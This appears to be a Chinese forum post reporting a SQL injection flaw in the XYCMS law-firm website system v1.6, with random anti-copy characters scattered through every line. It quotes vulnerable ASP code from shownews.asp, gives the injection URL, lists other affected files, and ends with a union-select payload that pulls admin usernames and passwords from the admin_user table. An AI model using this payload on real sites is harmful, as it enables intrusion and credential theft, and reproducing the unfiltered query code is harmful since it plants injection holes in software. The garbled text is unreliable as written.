前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
# v' M" e) ?) B, ^
( q# b/ l: Y3 B! I9 y9 y淫荡分割线# @- P5 {9 w/ u/ T* t. A2 w
--------------------------------------------------------
d; h/ ^+ f5 V. Z8 T0 D
" f! f- W5 _8 f, V. \6 h审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)3 Z1 c- {( s2 s4 S1 V" X: `
源码地址:http://down.chinaz.com/soft/29233.htm, e% j/ R! B0 u- O+ M# j5 J
3 Y" ?, W; o9 P3 p( T; J" b
漏洞文件:shownews.asp- ?9 J0 o7 C7 @
漏洞代码:7-13行( }6 E# c5 A1 q. _# p- L1 [; l
6 G6 |2 ]6 @3 N6 ?2 J$ u 0 o+ _5 ~' M$ r1 t2 D2 V; M4 m
<%
1 r- a0 g# Y0 q! b/ j9 a. a' z oid=request.QueryString("id")
, Z# D& i3 ?2 M4 R2 f2 O 0 Q9 N/ z/ Y/ N# M. s9 C
set snews=server.createobject("adodb.recordset") ! P% o8 B5 i# ^+ Y
exec="select * from [news] where id="&id1 {0 r+ K1 i. L( h
snews.open exec,conn,1,1
7 z8 Y; Q y+ u3 ~%>4 g! s7 U' @) a
+ s# Y$ n& d6 R5 G1 Z$ c, U8 M 2 V: i& j9 U3 i9 a6 e; L
什么过滤都没有 直造成注入
3 x |. M' a- M# F- y3 a( |1 S$ Y2 n ' X6 c# m1 `% Q
注入点:http://127.0.0.1:99/shownews.asp?id=xx' `) K0 x9 c- ]1 M' O0 P9 t
8 ]3 U2 |+ V" `) k/ ?
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
2 j4 \# {3 Q" R, b . N4 O: T, p d2 }, r4 G# B
x& Q6 u) ]. o, ]! `" o+ X" q
exp: union select 1,admin,password,4,5,7 from admin_user9 Q! S) W+ H- [! H8 ~' C
# T* e3 q* X; a2 r6 V( ? w! f9 ~
|